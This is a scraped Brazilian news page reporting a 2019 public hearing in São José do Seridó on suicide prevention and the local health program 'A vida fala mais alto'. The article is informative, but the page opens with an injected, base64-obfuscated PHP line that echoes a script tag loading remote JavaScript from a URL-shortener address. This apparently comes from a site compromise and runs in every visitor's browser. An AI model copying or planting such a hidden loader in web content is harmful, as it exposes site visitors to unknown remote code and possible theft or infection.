$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Audiência pública em São José do Seridó destaca a importância do programa de saúde “A vida fala mais alto”

Audiência pública em São José do Seridó destaca a importância do programa de saúde “A vida fala mais alto”
08 Set 2019

O município de São José do Seridó, distante 244 quilômetros de Natal, sediou uma audiência pública que tratou da prevenção do suicídio. Proposta pelo deputado estadual Vivaldo Costa (PSD) o encontro reuniu centenas de populares que acompanharam o debate que teve como tema “A vida fala mais alto: os desafios de como enfrentar o suicídio”.

Ao abrir os trabalhos Vivaldo Costa falou da importância da informação na prevenção de doenças, principalmente quando essas são psicológicas e mentais.“Nos meus mais de 50 anos de medicina, cheguei à conclusão que não existe nada mais importante que prevenir. No caso do suicídio, a informação é a principal arma para que o pior não aconteça. É preciso ensinar as pessoas a ter saúde e valorizar a vida”, iniciou Vivaldo.

Ainda em seu discurso, Vivaldo destacou o trabalho que vem sendo realizado no município de São José do Seridó, através do programa de saúde “A vida fala mais alto”, idealizado pela secretaria municipal e que conseguiu zerar os índices de suicídio no município, antes, um dos mais altos do Estado.

“Esse projeto é vitorioso. Ele aproveita os profissionais do Programa Saúde da Família (PSF) e estes desenvolvem um trabalho fantástico de saúde multiprofissional no tratamento das doenças mentais e psicológicas e, principalmente, no combate ao suicídio. Portanto, este programa precisa ser copiado em todos os municípios do Rio Grande do Norte e até do Brasil”, disse o deputado.

O programa “A vida fala mais alto”, foi criado em São José do Seridó em 2010 e consiste no acompanhamento de todos os moradores da cidade, que são orientados, medicados e tratados pelos profissionais de saúde do Programa Saúde da Família. Antes da implantação do programa, dezoito casos de suicídios foram registrados em apenas um ano no município. Depois do “A vida fala mais alto”, não se registra nenhum caso de suicídio há mais de seis anos em São José do Seridó.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *